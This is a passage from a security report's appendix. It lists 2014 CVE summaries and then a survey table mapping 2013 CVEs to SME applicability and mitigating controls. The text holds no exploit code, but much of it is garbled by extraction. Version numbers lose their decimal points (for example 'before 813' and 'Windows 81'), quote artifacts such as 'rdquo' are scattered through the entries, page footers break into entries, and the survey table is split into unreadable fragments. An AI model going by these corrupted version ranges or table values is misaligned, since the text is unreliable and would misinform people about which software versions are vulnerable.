CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.


CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo

CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory

corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo

CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo

CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo

CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo

CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo

CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo

CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo

CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document

CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28

an a3 01 5b ff byte sequence

CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication

CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate

CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo

CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors

CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork

CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL

CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo

CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo

CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message

CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService

CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets

CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code

CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c

CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows

and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158

CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site

CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo

CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460

CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014

CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo

CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction


Survey Responses



Cyb

erC

ontr

ols

App

licab

ility

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

3-0

00

8y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(U

ser

Po

licy)

A

nti

-Mal

war

eC

VE

-20

13

-00

22

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-00

84

yy

yn

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

3-0

14

0y

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

14

9n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-01

72

yn

nn

nN

ot

Mit

igat

edM

itig

ated

-U

ser

Acc

ess

(Str

on

gP

assw

ord

)P

atch

Man

agem

ent

CV

E-2

01

3-0

17

4n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Acc

ess

Po

licy

(Str

on

gP

assw

ord

)F

irew

all

Pat

chM

anag

emen

tC

VE

-20

13

-01

99

yn

nn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

ampS

ecu

reC

on

fig

ura

tio

nC

VE

-20

13

-02

53

nn

yn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Ser

ver)

CV

E-2

01

3-0

27

0n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

48

1n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

59

8n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

61

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

63

3y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

sin

g)

Fir

mw

are

Man

agem

ent

CV

E-2

01

3-0

64

9y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

sin

g)

Pat

chM

anag

emen

tC

VE

-20

13

-07

46

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-07

53

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-07

87

yy

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

90

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

03

5y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

3-1

10

2n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-11

40

nn

nn

nN

ot

Mit

igat

edN

ot

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Do

nrsquot

inst

all)

CV

E-2

01

3-1

14

4n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

ampF

irew

all

CV

E-2

01

3-1

15

3y

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-1

18

1n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-13

03

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-13

84

yy

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

CV

E-2

01

3-1

38

8n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-1

45

0y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-1

47

2y

yy

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Acc

ess

Po

licy)

CV

E-2

01

3-1

55

3y

ny

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

62

0y

yy

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

ampF

irew

all

CV

E-2

01

3-1

62

7n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

63

8y

yy

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

66

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

67

6y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

70

0y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tA

nti

-Mal

war

eC

VE

-20

13

-17

34

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-17

77

nn

yn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Pat

chM

anag

emen

tC

VE

-20

13

-23

19

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

C

VE

-20

13

-23

40

nn

nn

nN

ot

Mit

igat

edN

ot

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Do

nrsquot

inst

all)

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

3-2

35

0n

yn

ny

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

ampF

irew

all

CV

E-2

01

3-2

49

2y

ny

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-25

07

yn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Fir

mw

are

Man

agem

ent

An

ti-M

alw

are

CV

E-2

01

3-2

73

6y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-2

78

0n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-28

03

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-S

tro

ng

Pas

swor

ds

Pat

chM

anag

emen

tsC

VE

-20

13

-28

24

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-2

82

6n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-29

20

ny

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-30

64

yn

nn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-31

16

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-31

37

yy

yy

nN

ot

Mit

igat

edM

itig

ated

-A

nti

-Mal

war

eS

ecu

reC

on

fig

ura

tio

n(D

on

rsquotIn

stal

l)C

VE

-20

13

-31

94

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-31

99

yn

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-32

01

yn

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-32

06

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-32

80

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tamp

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-3

38

7n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-34

17

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

3-3

63

2y

yy

nn

No

tM

itig

ated

Mit

igat

ed-

Acc

ess

Po

licy

(Str

on

gP

assw

ord

)F

irew

all

CV

E-2

01

3-3

65

6n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-3

85

6y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tF

irew

all

An

ti-M

alw

are

CV

E-2

01

3-3

86

0y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-3

89

3y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n-

no

JS

CV

E-2

01

3-3

89

7y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-39

00

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-3

90

5y

yn

yn

No

tM

itig

ated

No

tM

itig

ated

-S

ecu

reC

on

fig

ura

tio

n(D

on

rsquotin

stal

l)C

VE

-20

13

-42

23

yn

nn

nN

ot

Mit

igat

edN

ot

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Do

nrsquot

inst

all)

CV

E-2

01

3-4

43

6n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-4

47

8n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

nC

VE

-20

13

-45

29

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-45

55

yn

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-47

76

yn

nn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-4

78

2n

nn

nn

No

tM

itig

ated

No

tM

itig

ated

-S

ecu

reC

on

fig

ura

tio

n(D

on

rsquotin

stal

l)C

VE

-20

13

-50

57

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

3-5

36

9n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

ampS

ecu

reC

on

fig

ura

tio

nC

VE

-20

13

-54

28

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-54

31

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-54

94

nn

nn

nN

ot

Mit

igat

edN

ot

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-5

50

7n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

3-5

53

6n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

3-5

55

9n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tS

